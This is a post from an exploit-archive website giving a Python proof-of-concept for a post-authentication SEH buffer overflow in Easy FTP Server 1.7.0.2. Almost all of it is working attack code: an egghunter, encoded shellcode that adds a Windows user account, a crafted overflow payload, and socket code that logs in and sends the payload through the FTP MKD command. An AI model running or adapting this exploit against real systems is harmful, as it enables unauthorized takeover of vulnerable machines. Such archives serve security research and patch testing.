Home / exploits Easy FTP Server 1.7.0.2 Buffer Overflow
Posted on 01 June 2011
#!/usr/bin/python # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF # Original Author: dookie2000ca || Windows XP SP3 Professional # Author: b33f # Windows XP Home SP1 # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip import socket import sys #------------------------------------------------------------------------------- #SE Handler is overwritten - offset to SEH 256 #short jump xEBx07 #pop pop ret rpcrt4.dll 78011926 #badchars 0x00 0x0a 0x2f 0x5c #------------------------------------------------------------------------------- bunny = ( "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8" "x77x30x30x74" # egghunter marker w00t "x8BxFAxAFx75xEAxAFx75xE7xFFxE7") #win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNai shellcode = ( "xdbxd3x31xc9xb8x5dx82xf8x52xb1x34xd9x74x24xf4x5f" "x83xc7x04x31x47x13x03x1ax91x1axa7x58x7dx9ex48xa0" "x7ex94x0cx9cxf5xd6x8bxa4x08xc8x1fx1bx13x9dx7fx83" "x22x4ax36x48x10x07xc8xa0x68xd7x52x90x0fx17x10xef" "xcex52xd4xeex12x89x13xcbxc6x6axd8x5ex02xf9xbfx84" "xcdx15x59x4fxc1xa2x2dx10xc6x35xd9x25xeaxbex1cxd2" "x9ax9dx3ax20x5ex2cx83x4cxebx0fx33x09x2bxf7x3fx9a" "xecx04xcbxecxf0xb9x40x64x01x29x5fxffx91x1dx60xff" "x91xd6x09xc3xcexd9x3fx5bxa7x90x38x18x87xd8xe8x76" "xf8x95x0dxd9x90x31xf3x6fx6ex15xf3x88x0cxf4x6fx78" "xb6x7ex15xa4x17x1cxf5xcax02x96xd5x67xbex33x64xa7" "x26xc9xebxccx86x44xccx3dx86xe2x48x61x2excdx70x0f" "x4bx65x51xa3xfcxe6xf0x57x64x9bx9dxd2x1ax7bx23x78" "xb6x12xcdxe9x3bx91x63x88xcfx36xf6x39x10xafx83xde" "x3bx0fx43x61xf8x0bx9b") payload = "A"*7 + "w00tw00t" + shellcode + "A"*10 + "xEBx07x90x90" + "x26x19x01x78" + "x90"*25 + bunny + "A"*133 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.1.70',21)) s.recv(1024) s.send('USER b33f ') s.recv(1024) s.send('PASS b33f ') s.recv(1024) s.send('MKD ' + payload + ' ') s.recv(1024) s.send('QUIT ') s.close
